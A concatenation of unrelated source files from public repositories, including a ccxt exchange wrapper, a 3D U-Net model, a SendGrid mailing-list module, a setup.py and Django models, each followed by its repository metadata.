if epoch == starting_epoch and args.resume:
first_epoch_start = time.time()
message = job_name + ' d_end'
send_signal.send(args.node, 10002, message)
elif epoch == starting_epoch:
first_epoch_start = time.time()
if epoch == starting_epoch:
# send signal to indicate checkpoint is qualified
message = job_name + ' ckpt_qual'
send_signal.send(args.node, 10002, message)
def on_epoch_end(self, epoch, logs=None):
if epoch == starting_epoch:
first_epoch_time = int(time.time() - first_epoch_start)
message = job_name + ' 1st_epoch ' + str(first_epoch_time)
send_signal.send(args.node, 10002, message)
progress = round((epoch+1) / round(total_epochs/2), 2)
message = job_name + ' completion ' + str(progress)
send_signal.send(args.node, 10002, message)
my_callback = PrintEpoch()
callbacks = [tensorboard_callback, my_callback]
#[checkpoint, lr_reducer, lr_scheduler, tensorboard_callback]
# Run training
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=round(total_epochs/2),
validation_data=(x_test, y_test),
shuffle=True,
callbacks=callbacks,
initial_epoch=starting_epoch,
verbose=1
)
# Score trained model.
scores = model.evaluate(x_test, y_test, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
# send signal to indicate job has finished
message = job_name + ' finish'
send_signal.send(args.node, 10002, message)
| 32.751073
| 118
| 0.693618
|
d7d2d0cb92d8f12c57b42bf07cdbb0dccf6f70d3
| 8,879
|
py
|
Python
|
python/ccxt/exmo.py
|
morgwn-shaw/bttb
|
a0e8dac53f233f747ad1c50c13a1d4b2d0ca14a5
|
[
"MIT"
] | 3
|
2017-11-19T22:08:29.000Z
|
2018-02-21T11:14:41.000Z
|
python/ccxt/exmo.py
|
morgwn-shaw/bttb
|
a0e8dac53f233f747ad1c50c13a1d4b2d0ca14a5
|
[
"MIT"
] | null | null | null |
python/ccxt/exmo.py
|
morgwn-shaw/bttb
|
a0e8dac53f233f747ad1c50c13a1d4b2d0ca14a5
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from ccxt.base.exchange import Exchange
import hashlib
from ccxt.base.errors import ExchangeError
class exmo (Exchange):
def describe(self):
return self.deep_extend(super(exmo, self).describe(), {
'id': 'exmo',
'name': 'EXMO',
'countries': ['ES', 'RU'], # Spain, Russia
            'rateLimit': 1000,  # once every 1000 ms ≈ 60 requests per minute ≈ 1 request per second
'version': 'v1',
'hasCORS': False,
'hasFetchTickers': True,
'hasWithdraw': True,
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/27766491-1b0ea956-5eda-11e7-9225-40d67b481b8d.jpg',
'api': 'https://api.exmo.com',
'www': 'https://exmo.me',
'doc': [
'https://exmo.me/en/api_doc',
'https://github.com/exmo-dev/exmo_api_lib/tree/master/nodejs',
],
},
'api': {
'public': {
'get': [
'currency',
'order_book',
'pair_settings',
'ticker',
'trades',
],
},
'private': {
'post': [
'user_info',
'order_create',
'order_cancel',
'user_open_orders',
'user_trades',
'user_cancelled_orders',
'order_trades',
'required_amount',
'deposit_address',
'withdraw_crypt',
'withdraw_get_txid',
'excode_create',
'excode_load',
'wallet_history',
],
},
},
'fees': {
'trading': {
'maker': 0.2 / 100,
'taker': 0.2 / 100,
},
},
})
def fetch_markets(self):
markets = self.publicGetPairSettings()
keys = list(markets.keys())
result = []
for p in range(0, len(keys)):
id = keys[p]
market = markets[id]
symbol = id.replace('_', '/')
base, quote = symbol.split('/')
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'limits': {
'amount': {
'min': market['min_quantity'],
'max': market['max_quantity'],
},
'price': {
'min': market['min_price'],
'max': market['max_price'],
},
'cost': {
'min': market['min_amount'],
'max': market['max_amount'],
},
},
'precision': {
'amount': 8,
'price': 8,
},
'info': market,
})
return result
def fetch_balance(self, params={}):
self.load_markets()
response = self.privatePostUserInfo()
result = {'info': response}
for c in range(0, len(self.currencies)):
currency = self.currencies[c]
account = self.account()
if currency in response['balances']:
account['free'] = float(response['balances'][currency])
if currency in response['reserved']:
account['used'] = float(response['reserved'][currency])
account['total'] = self.sum(account['free'], account['used'])
result[currency] = account
return self.parse_balance(result)
def fetch_order_book(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
response = self.publicGetOrderBook(self.extend({
'pair': market['id'],
}, params))
orderbook = response[market['id']]
return self.parse_order_book(orderbook, None, 'bid', 'ask')
def parse_ticker(self, ticker, market=None):
timestamp = ticker['updated'] * 1000
symbol = None
if market:
symbol = market['symbol']
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': float(ticker['high']),
'low': float(ticker['low']),
'bid': float(ticker['buy_price']),
'ask': float(ticker['sell_price']),
'vwap': None,
'open': None,
'close': None,
'first': None,
'last': float(ticker['last_trade']),
'change': None,
'percentage': None,
'average': float(ticker['avg']),
'baseVolume': float(ticker['vol']),
'quoteVolume': float(ticker['vol_curr']),
'info': ticker,
}
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
response = self.publicGetTicker(params)
result = {}
ids = list(response.keys())
for i in range(0, len(ids)):
id = ids[i]
market = self.markets_by_id[id]
symbol = market['symbol']
ticker = response[id]
result[symbol] = self.parse_ticker(ticker, market)
return result
def fetch_ticker(self, symbol, params={}):
self.load_markets()
response = self.publicGetTicker(params)
market = self.market(symbol)
return self.parse_ticker(response[market['id']], market)
def parse_trade(self, trade, market):
timestamp = trade['date'] * 1000
return {
'id': str(trade['trade_id']),
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': market['symbol'],
'order': None,
'type': None,
'side': trade['type'],
'price': float(trade['price']),
'amount': float(trade['quantity']),
}
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
response = self.publicGetTrades(self.extend({
'pair': market['id'],
}, params))
return self.parse_trades(response[market['id']], market)
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
prefix = ''
if type == 'market':
prefix = 'market_'
if price is None:
price = 0
order = {
'pair': self.market_id(symbol),
'quantity': amount,
'price': price,
'type': prefix + side,
}
response = self.privatePostOrderCreate(self.extend(order, params))
return {
'info': response,
'id': str(response['order_id']),
}
def cancel_order(self, id, symbol=None, params={}):
self.load_markets()
return self.privatePostOrderCancel({'order_id': id})
def withdraw(self, currency, amount, address, params={}):
self.load_markets()
result = self.privatePostWithdrawCrypt(self.extend({
'amount': amount,
'currency': currency,
'address': address,
}, params))
return {
'info': result,
'id': result['task_id'],
}
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'] + '/' + self.version + '/' + path
if api == 'public':
if params:
url += '?' + self.urlencode(params)
else:
nonce = self.nonce()
body = self.urlencode(self.extend({'nonce': nonce}, params))
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Key': self.apiKey,
'Sign': self.hmac(self.encode(body), self.encode(self.secret), hashlib.sha512),
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def request(self, path, api='public', method='GET', params={}, headers=None, body=None):
response = self.fetch2(path, api, method, params, headers, body)
if 'result' in response:
if response['result']:
return response
raise ExchangeError(self.id + ' ' + self.json(response))
return response
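# Example usage (illustrative sketch; the API credentials and the BTC/USD symbol are placeholders/assumptions):
# exchange = exmo({'apiKey': 'YOUR_KEY', 'secret': 'YOUR_SECRET'})
# print(exchange.fetch_ticker('BTC/USD'))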
| 35.374502
| 126
| 0.463453
|
fdbf5d346c596b15ed39108d549e413e9a296110
| 3,599
|
py
|
Python
|
pytorch/model.py
|
ginobilinie/3d-unet
|
164978b4421c2196e6066bc5391ace5b83ab2216
|
[
"MIT"
] | 1
|
2021-04-14T05:36:55.000Z
|
2021-04-14T05:36:55.000Z
|
pytorch/model.py
|
ginobilinie/3d-unet
|
164978b4421c2196e6066bc5391ace5b83ab2216
|
[
"MIT"
] | null | null | null |
pytorch/model.py
|
ginobilinie/3d-unet
|
164978b4421c2196e6066bc5391ace5b83ab2216
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
class UNet3D(nn.Module):
def __init__(self, in_channel, n_classes):
self.in_channel = in_channel
self.n_classes = n_classes
super(UNet3D, self).__init__()
self.ec0 = self.encoder(self.in_channel, 32, bias=False, batchnorm=False)
self.ec1 = self.encoder(32, 64, bias=False, batchnorm=False)
self.ec2 = self.encoder(64, 64, bias=False, batchnorm=False)
self.ec3 = self.encoder(64, 128, bias=False, batchnorm=False)
self.ec4 = self.encoder(128, 128, bias=False, batchnorm=False)
self.ec5 = self.encoder(128, 256, bias=False, batchnorm=False)
self.ec6 = self.encoder(256, 256, bias=False, batchnorm=False)
self.ec7 = self.encoder(256, 512, bias=False, batchnorm=False)
self.pool0 = nn.MaxPool3d(2)
self.pool1 = nn.MaxPool3d(2)
self.pool2 = nn.MaxPool3d(2)
self.dc9 = self.decoder(512, 512, kernel_size=2, stride=2, bias=False)
self.dc8 = self.decoder(256 + 512, 256, kernel_size=3, stride=1, padding=1, bias=False)
self.dc7 = self.decoder(256, 256, kernel_size=3, stride=1, padding=1, bias=False)
self.dc6 = self.decoder(256, 256, kernel_size=2, stride=2, bias=False)
self.dc5 = self.decoder(128 + 256, 128, kernel_size=3, stride=1, padding=1, bias=False)
self.dc4 = self.decoder(128, 128, kernel_size=3, stride=1, padding=1, bias=False)
self.dc3 = self.decoder(128, 128, kernel_size=2, stride=2, bias=False)
self.dc2 = self.decoder(64 + 128, 64, kernel_size=3, stride=1, padding=1, bias=False)
self.dc1 = self.decoder(64, 64, kernel_size=3, stride=1, padding=1, bias=False)
self.dc0 = self.decoder(64, n_classes, kernel_size=1, stride=1, bias=False)
def encoder(self, in_channels, out_channels, kernel_size=3, stride=1, padding=0,
bias=True, batchnorm=False):
if batchnorm:
layer = nn.Sequential(
nn.Conv3d(in_channels, out_channels, kernel_size, stride=stride, padding=padding, bias=bias),
                nn.BatchNorm3d(out_channels),  # 3-D batch norm to match the Conv3d layers
nn.ReLU())
else:
layer = nn.Sequential(
nn.Conv3d(in_channels, out_channels, kernel_size, stride=stride, padding=padding, bias=bias),
nn.ReLU())
return layer
def decoder(self, in_channels, out_channels, kernel_size, stride=1, padding=0,
output_padding=0, bias=True):
layer = nn.Sequential(
nn.ConvTranspose3d(in_channels, out_channels, kernel_size, stride=stride,
padding=padding, output_padding=output_padding, bias=bias),
nn.ReLU())
return layer
def forward(self, x):
e0 = self.ec0(x)
syn0 = self.ec1(e0)
e1 = self.pool0(syn0)
e2 = self.ec2(e1)
syn1 = self.ec3(e2)
del e0, e1, e2
e3 = self.pool1(syn1)
e4 = self.ec4(e3)
syn2 = self.ec5(e4)
del e3, e4
e5 = self.pool2(syn2)
e6 = self.ec6(e5)
e7 = self.ec7(e6)
del e5, e6
        d9 = torch.cat((self.dc9(e7), syn2), dim=1)  # concatenate skip connection along the channel dimension
del e7, syn2
d8 = self.dc8(d9)
d7 = self.dc7(d8)
del d9, d8
        d6 = torch.cat((self.dc6(d7), syn1), dim=1)
del d7, syn1
d5 = self.dc5(d6)
d4 = self.dc4(d5)
del d6, d5
        d3 = torch.cat((self.dc3(d4), syn0), dim=1)
del d4, syn0
d2 = self.dc2(d3)
d1 = self.dc1(d2)
del d3, d2
d0 = self.dc0(d1)
return d0
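# Note added for clarity (not in the original file): nn.Conv3d expects inputs in
# (batch, channel, depth, height, width) layout, and because the convolutions above use
# no padding, spatial sizes shrink at every encoder stage, so input volumes must be large
# enough to survive the three pooling steps and still align with the decoder's skip
# concatenations.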
avg_line_length: 37.103093 | max_line_length: 109 | alphanum_fraction: 0.588497

hexsha: 90d876744815401039d9cf87c0c7768941c6a5b9 | size: 10740 | ext: py | lang: Python
max_stars_repo: path logic/emails/mailing_list.py, name D516-lang/origin-website, head_hexsha 3281a7017cf695cd0eeaca1a641be6ab5014118b, licenses ["MIT"], count null, events null
max_issues_repo: path logic/emails/mailing_list.py, name D516-lang/origin-website, head_hexsha 3281a7017cf695cd0eeaca1a641be6ab5014118b, licenses ["MIT"], count null, events null
max_forks_repo: path logic/emails/mailing_list.py, name D516-lang/origin-website, head_hexsha 3281a7017cf695cd0eeaca1a641be6ab5014118b, licenses ["MIT"], count null, events null
content:
import json
import re
from config import constants
from config import universal
from database import db, db_common, db_models
from flask import jsonify, flash, redirect
from flask_babel import gettext, Babel, Locale
from logic.emails import email_types
from nameparser import HumanName
import sendgrid
from tools import db_utils
from util import sendgrid_wrapper as sgw
from util.misc import log
DEFAULT_SENDER = sgw.Email(universal.CONTACT_EMAIL, universal.BUSINESS_NAME)
# we use our own database as the final source of truth for our mailing list
# but we sync email signups and unsubscribes to sendgrid for convenience
def add_sendgrid_contact(email, full_name=None, country_code=None, dapp_user=None):
try:
# pytest.skip("avoid making remote calls")
sg_api = sendgrid.SendGridAPIClient(apikey=constants.SENDGRID_API_KEY)
first_name = last_name = None
if full_name:
name = HumanName(full_name)
first_name = name.first
last_name = name.last
data = [{
"email": email,
"first_name": first_name,
"last_name": last_name,
"country_code": country_code,
"dapp_user": dapp_user
}]
response = sg_api.client.contactdb.recipients.post(request_body=data)
except Exception as e:
log('ERROR add_sendgrid_contact:', type(e), e)
return False
return True
def unsubscribe_sendgrid_contact(email):
try:
sg_api = sendgrid.SendGridAPIClient(apikey=constants.SENDGRID_API_KEY)
unsubscribe_group = 51716 # Universal unsubscribe group
data = {
"recipient_emails": [email]
}
response = sg_api.client.asm.groups._(unsubscribe_group).suppressions.post(request_body=data)
except Exception as e:
log('ERROR unsubscribe_sendgrid_contact:', type(e), e)
return False
return True
# Unsubscribe a list of emails.
def mass_unsubscribe_sendgrid_contact(emails):
try:
sg_api = sendgrid.SendGridAPIClient(apikey=constants.SENDGRID_API_KEY)
unsubscribe_group = 51716 # Universal unsubscribe group
data = {
"recipient_emails": emails
}
response = sg_api.client.asm.groups._(unsubscribe_group).suppressions.post(request_body=data)
except Exception as e:
log('ERROR mass_unsubscribe_sendgrid_contact:', type(e), e)
return False
return True
# Inserts or updates an entry in the email_list table.
# Returns True if a new entry was added, False if the entry already existed.
# Raises an exception in case of an error.
def add_contact(email, first_name, last_name, ip_addr, country_code):
if not re.match(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)", email):
raise Exception('Invalid email')
# Emails are stored normalized to lowercase in the DB.
email = email.lower()
try:
# Attempt to load any existing entry matching the email.
row = db_models.EmailList.query.filter_by(email=email).first()
if row:
# Update the existing entry.
new_contact = False
row.first_name = first_name
row.last_name = last_name
row.ip_addr = ip_addr
row.country_code = country_code
else:
# Insert a new entry.
new_contact = True
row = db_models.EmailList()
row.email = email
row.first_name = first_name
row.last_name = last_name
row.unsubscribed = False
row.ip_addr = ip_addr
row.country_code = country_code
db.session.add(row)
db.session.commit()
except Exception as e:
log('ERROR add_contact:', type(e), e)
raise e
return new_contact
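# A minimal usage sketch (illustrative only, not part of the original module; the email
# address and request data below are made up):
#
#   is_new = add_contact('alice@example.com', 'Alice', 'Smith', '203.0.113.5', 'US')
#   if is_new:
#       add_sendgrid_contact('alice@example.com', full_name='Alice Smith', country_code='US')
#       send_welcome('alice@example.com', source=None)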
def send_welcome(email, source):
if not re.match(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)", email):
return
if source is not None and source.lower() == 'ousd':
email_types.send_email_type('welcome_ousd', DEFAULT_SENDER, email)
else:
email_types.send_email_type('welcome1', DEFAULT_SENDER, email)
def presale(full_name, email, desired_allocation, desired_allocation_currency, citizenship, sending_addr, ip_addr):
if not re.match(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)", email):
return gettext('Please enter a valid email address')
try:
me = db_models.Presale()
me.full_name = full_name
me.email = email
# me.accredited = (accredited=='1')
# me.entity_type = entity_type
me.desired_allocation = desired_allocation
me.desired_allocation_currency = desired_allocation_currency
me.citizenship = citizenship
me.sending_addr = sending_addr
# me.note = note
me.ip_addr = ip_addr
db.session.add(me)
db.session.commit()
except Exception as e:
log('ERROR presale:', type(e), e)
return gettext('Ooops! Something went wrong.')
if sending_addr:
sending_addr = "<a href='https://etherscan.io/address/"+sending_addr+"'>"+sending_addr+"</a>" if sending_addr.startswith('0x') else "<a href='https://blockchain.info/address/"+sending_addr+"'>"+sending_addr+"</a>"
message = """Name: %s<br>
Email: %s<br>
Desired allocation: %s %s<br>
Citizenship: %s<br>
Address: %s<br>
IP: %s""" % (
full_name, email,
desired_allocation, desired_allocation_currency,
citizenship,
sending_addr,
ip_addr)
email_types.send_email_type('presale', DEFAULT_SENDER, email)
sgw.notify_founders(message, subject=full_name + " is interested in the presale")
return gettext('Thanks! We\'ll be in touch soon.')
# Mark an email as unsubscribed in our DB.
# Raises an exception in case of an error.
def unsubscribe(email):
if not re.match(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)", email):
raise Exception('Invalid email address')
me = db_models.EmailList.query.filter_by(email=email.lower()).first()
if not me:
print("returning not me")
return
print("unsubscribing...")
me.unsubscribed = True
db.session.add(me)
db.session.commit()
def send_one_off(email_type):
with db_utils.request_context():
# the message log takes care of deduping emails that may appear in multiple tables
for e in db_models.EmailList.query.filter_by(unsubscribed=False):
log(e.email)
email_types.send_email_type(email_type, DEFAULT_SENDER, e.email)
def partners_interest(name, company_name, email, website, note, ip_addr):
if not re.match(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)", email):
return gettext('Please enter a valid email address')
if website and not re.match(r"(^(?:http(s)?:\/\/)?[\w.-]+(?:\.[\w\.-]+)+[\w\-\._~:/?#[\]@!\$&'\(\)\*\+,;=.]+$)", website):
return gettext('Please enter a valid website address')
try:
me = db_models.Interest()
me.name = name
me.company_name = company_name
me.email = email
me.website = website
me.note = note
me.ip_addr = ip_addr
db.session.add(me)
db.session.commit()
except Exception as e:
log('ERROR partners_interest:', type(e), e)
return gettext('Ooops! Something went wrong.')
message = "Name: %s<br>Company Name: %s<br>Email: %s<br>Website: %s<br>Note: %s" % (name, company_name,
email, website, note)
email_types.send_email_type('build_on_origin', DEFAULT_SENDER, email)
sgw.notify_admins(message,
subject="{name} ({company_name}) is interested in building on Origin".format(name=name,
company_name=company_name))
return gettext('Thanks! We\'ll be in touch soon.')
def list_cleanup():
sg_api = sendgrid.SendGridAPIClient(apikey=constants.SENDGRID_API_KEY)
response = sg_api.client.suppression.spam_reports.get()
people = json.loads(response.body)
print("Unsubscribing the following spam reporting email addresses:")
for person in people:
email = person['email'].lower()
contact = db_models.EmailList.query.filter_by(email=email).first()
# remove them from our marketing lists
# unsubscribe_sendgrid_contact(email)
print(person['email'])
if contact:
contact.spam_report = True
contact.unsubscribed = True
db.session.add(contact)
db.session.commit()
response = sg_api.client.suppression.invalid_emails.get()
people = json.loads(response.body)
print("Unsubscribing the following invalid email addresses:")
for person in people:
email = person['email'].lower()
contact = db_models.EmailList.query.filter_by(email=email).first()
# remove them from our marketing lists
# unsubscribe_sendgrid_contact(email)
print(person['email'])
if contact:
contact.invalid = True
contact.unsubscribed = True
db.session.add(contact)
db.session.commit()
response = sg_api.client.suppression.blocks.get()
people = json.loads(response.body)
print("Unsubscribing the following blocked email addresses:")
for person in people:
email = person['email'].lower()
contact = db_models.EmailList.query.filter_by(email=email).first()
# remove them from our marketing lists
# unsubscribe_sendgrid_contact(email)
print(person['email'])
if contact:
contact.blocked = True
contact.unsubscribed = True
db.session.add(contact)
db.session.commit()
response = sg_api.client.suppression.bounces.get()
people = json.loads(response.body)
print("Unsubscribing the following bounced email addresses:")
for person in people:
email = person['email'].lower()
contact = db_models.EmailList.query.filter_by(email=email).first()
# remove them from our marketing lists
# unsubscribe_sendgrid_contact(email)
print(person['email'])
if contact:
contact.bounced = True
contact.unsubscribed = True
db.session.add(contact)
db.session.commit()
avg_line_length: 38.633094 | max_line_length: 221 | alphanum_fraction: 0.618901

hexsha: c17e9d2a317ca03c68369638c14d0db36101a746 | size: 1222 | ext: py | lang: Python
max_stars_repo: path hatloads/blocks/windows/__init__.py, name YurinDoctrine/HatLoads, head_hexsha adc6fe51368f24a4a0b818138b6afa6e46969ff8, licenses ["MIT"], count 1, events 2022-01-20T12:00:12.000Z to 2022-01-20T12:00:12.000Z
max_issues_repo: path hatloads/blocks/windows/__init__.py, name YurinDoctrine/HatLoads, head_hexsha adc6fe51368f24a4a0b818138b6afa6e46969ff8, licenses ["MIT"], count null, events null
max_forks_repo: path hatloads/blocks/windows/__init__.py, name YurinDoctrine/HatLoads, head_hexsha adc6fe51368f24a4a0b818138b6afa6e46969ff8, licenses ["MIT"], count null, events null
content:
#!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020-2022 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
from .api import API
class Windows:
blocks = {
'api': API().block
}
avg_line_length: 35.941176 | max_line_length: 80 | alphanum_fraction: 0.754501

hexsha: b90102466efae9d60792a6ca7e5d8cf2539a7c0a | size: 1261 | ext: py | lang: Python
max_stars_repo: path setup.py, name danimateo/ytmdl, head_hexsha c2f425e3493f414f246cf2c064e6491e8231c7a1, licenses ["MIT"], count null, events null
max_issues_repo: path setup.py, name danimateo/ytmdl, head_hexsha c2f425e3493f414f246cf2c064e6491e8231c7a1, licenses ["MIT"], count null, events null
max_forks_repo: path setup.py, name danimateo/ytmdl, head_hexsha c2f425e3493f414f246cf2c064e6491e8231c7a1, licenses ["MIT"], count null, events null
content:
#!/usr/bin/env python3
"""Setup ytmdl."""
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
req_pkgs = [
'youtube_dl',
'mutagen',
'itunespy==1.5.5',
'requests',
'colorama',
'bs4',
'downloader-cli',
'lxml',
'pyxdg',
'ffmpeg-python',
'pysocks',
'unidecode',
'tensorflow',
'inaSpeechSegmenter'
]
if __name__ == '__main__':
setuptools.setup(
name="ytmdl",
version="2020.07.09",
author="Deepjyoti Barman",
author_email="deep.barma30@gmail.com",
description="Youtube Music Downloader",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/deepjyoti30/ytmdl",
packages=setuptools.find_packages(),
classifiers=(
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
),
        python_requires=">=3",
scripts=['bin/ytmdl'],
install_requires=req_pkgs,
setup_requires=req_pkgs
)
avg_line_length: 26.270833 | max_line_length: 54 | alphanum_fraction: 0.528945

hexsha: add4366a1cd4692905bb2459271be6454d4f0d46 | size: 7543 | ext: py | lang: Python
max_stars_repo: path banco.py, name lcs-amorim/OPE-EasyParty, head_hexsha b3439bf21523d7f3fb19b12283c24f364bf54388, licenses ["Apache-2.0"], count null, events null
max_issues_repo: path banco.py, name lcs-amorim/OPE-EasyParty, head_hexsha b3439bf21523d7f3fb19b12283c24f364bf54388, licenses ["Apache-2.0"], count 4, events 2020-06-05T18:01:15.000Z to 2021-09-07T23:51:04.000Z
max_forks_repo: path banco.py, name lcs-amorim/OPE-EasyParty, head_hexsha b3439bf21523d7f3fb19b12283c24f364bf54388, licenses ["Apache-2.0"], count 1, events 2018-10-02T23:45:15.000Z to 2018-10-02T23:45:15.000Z
content:
# This is an auto-generated Django model module.
# You'll have to do the following manually to clean this up:
# * Rearrange models' order
# * Make sure each model has one field with primary_key=True
# * Make sure each ForeignKey has `on_delete` set to the desired behavior.
# * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table
# Feel free to rename the models, but don't rename db_table values or field names.
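# An illustrative sketch (not part of the generated file) of what a cleaned-up field could
# look like, with the ForeignKey's on_delete written as an explicit keyword argument:
#
#   codigo_u = models.ForeignKey('Usuario', on_delete=models.DO_NOTHING, db_column='Codigo_U')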
from django.db import models
class Colaboradores(models.Model):
nome_c = models.CharField(db_column='Nome_C', max_length=100) # Field name made lowercase.
codigo_c = models.AutoField(db_column='Codigo_C', primary_key=True) # Field name made lowercase.
telefone_c = models.IntegerField(db_column='Telefone_C') # Field name made lowercase.
class Meta:
managed = False
db_table = 'Colaboradores'
class Contratos(models.Model):
codigo_u = models.ForeignKey('Usuario', models.DO_NOTHING, db_column='Codigo_U') # Field name made lowercase.
descricao = models.TextField(db_column='Descricao') # Field name made lowercase.
dia = models.DateField(db_column='Dia') # Field name made lowercase.
hora = models.TimeField(db_column='Hora') # Field name made lowercase.
endereco_ct = models.CharField(db_column='Endereco_CT', max_length=100) # Field name made lowercase.
class Meta:
managed = False
db_table = 'Contratos'
class Fornecedor(models.Model):
nome_f = models.CharField(db_column='Nome_F', primary_key=True, max_length=100) # Field name made lowercase.
email_f = models.CharField(db_column='Email_F', max_length=100, blank=True, null=True) # Field name made lowercase.
endereco_f = models.CharField(db_column='Endereco_F', max_length=255) # Field name made lowercase.
telefoneprincipal = models.IntegerField(db_column='TelefonePrincipal') # Field name made lowercase.
telefonesecundario = models.IntegerField(db_column='TelefoneSecundario', blank=True, null=True) # Field name made lowercase.
categoria_f = models.CharField(db_column='Categoria_F', max_length=100) # Field name made lowercase.
class Meta:
managed = False
db_table = 'Fornecedor'
class Produto(models.Model):
codigo_p = models.AutoField(db_column='Codigo_P', primary_key=True) # Field name made lowercase.
nome_f = models.ForeignKey(Fornecedor, models.DO_NOTHING, db_column='Nome_F') # Field name made lowercase.
nome_p = models.CharField(db_column='Nome_P', max_length=100) # Field name made lowercase.
quantidade = models.SmallIntegerField(db_column='Quantidade') # Field name made lowercase.
categoria_p = models.CharField(db_column='Categoria_P', max_length=100) # Field name made lowercase.
class Meta:
managed = False
db_table = 'Produto'
class Usuario(models.Model):
codigo_u = models.AutoField(db_column='Codigo_U', primary_key=True) # Field name made lowercase.
nome_u = models.CharField(db_column='Nome_U', max_length=255) # Field name made lowercase.
usuario = models.CharField(db_column='Usuario', unique=True, max_length=100) # Field name made lowercase.
senha = models.CharField(db_column='Senha', max_length=100) # Field name made lowercase.
email_u = models.CharField(db_column='Email_U', max_length=100, blank=True, null=True) # Field name made lowercase.
cpf = models.IntegerField(db_column='CPF', unique=True) # Field name made lowercase.
telefone_u = models.IntegerField(db_column='Telefone_U') # Field name made lowercase.
endereco_u = models.CharField(db_column='Endereco_U', max_length=255) # Field name made lowercase.
news = models.NullBooleanField(db_column='News') # Field name made lowercase.
class Meta:
managed = False
db_table = 'Usuario'
class AuthGroup(models.Model):
name = models.CharField(unique=True, max_length=80)
class Meta:
managed = False
db_table = 'auth_group'
class AuthGroupPermissions(models.Model):
group = models.ForeignKey(AuthGroup, models.DO_NOTHING)
permission = models.ForeignKey('AuthPermission', models.DO_NOTHING)
class Meta:
managed = False
db_table = 'auth_group_permissions'
unique_together = (('group', 'permission'),)
class AuthPermission(models.Model):
name = models.CharField(max_length=255)
content_type = models.ForeignKey('DjangoContentType', models.DO_NOTHING)
codename = models.CharField(max_length=100)
class Meta:
managed = False
db_table = 'auth_permission'
unique_together = (('content_type', 'codename'),)
class AuthUser(models.Model):
password = models.CharField(max_length=128)
last_login = models.DateTimeField(blank=True, null=True)
is_superuser = models.BooleanField()
username = models.CharField(unique=True, max_length=150)
first_name = models.CharField(max_length=30)
last_name = models.CharField(max_length=150)
email = models.CharField(max_length=254)
is_staff = models.BooleanField()
is_active = models.BooleanField()
date_joined = models.DateTimeField()
class Meta:
managed = False
db_table = 'auth_user'
class AuthUserGroups(models.Model):
user = models.ForeignKey(AuthUser, models.DO_NOTHING)
group = models.ForeignKey(AuthGroup, models.DO_NOTHING)
class Meta:
managed = False
db_table = 'auth_user_groups'
unique_together = (('user', 'group'),)
class AuthUserUserPermissions(models.Model):
user = models.ForeignKey(AuthUser, models.DO_NOTHING)
permission = models.ForeignKey(AuthPermission, models.DO_NOTHING)
class Meta:
managed = False
db_table = 'auth_user_user_permissions'
unique_together = (('user', 'permission'),)
class DjangoAdminLog(models.Model):
action_time = models.DateTimeField()
object_id = models.TextField(blank=True, null=True)
object_repr = models.CharField(max_length=200)
action_flag = models.SmallIntegerField()
change_message = models.TextField()
content_type = models.ForeignKey('DjangoContentType', models.DO_NOTHING, blank=True, null=True)
user = models.ForeignKey(AuthUser, models.DO_NOTHING)
class Meta:
managed = False
db_table = 'django_admin_log'
class DjangoContentType(models.Model):
app_label = models.CharField(max_length=100)
model = models.CharField(max_length=100)
class Meta:
managed = False
db_table = 'django_content_type'
unique_together = (('app_label', 'model'),)
class DjangoMigrations(models.Model):
app = models.CharField(max_length=255)
name = models.CharField(max_length=255)
applied = models.DateTimeField()
class Meta:
managed = False
db_table = 'django_migrations'
class DjangoSession(models.Model):
session_key = models.CharField(primary_key=True, max_length=40)
session_data = models.TextField()
expire_date = models.DateTimeField()
class Meta:
managed = False
db_table = 'django_session'
class Sysdiagrams(models.Model):
name = models.CharField(max_length=128)
principal_id = models.IntegerField()
diagram_id = models.AutoField(primary_key=True)
version = models.IntegerField(blank=True, null=True)
definition = models.BinaryField(blank=True, null=True)
class Meta:
managed = False
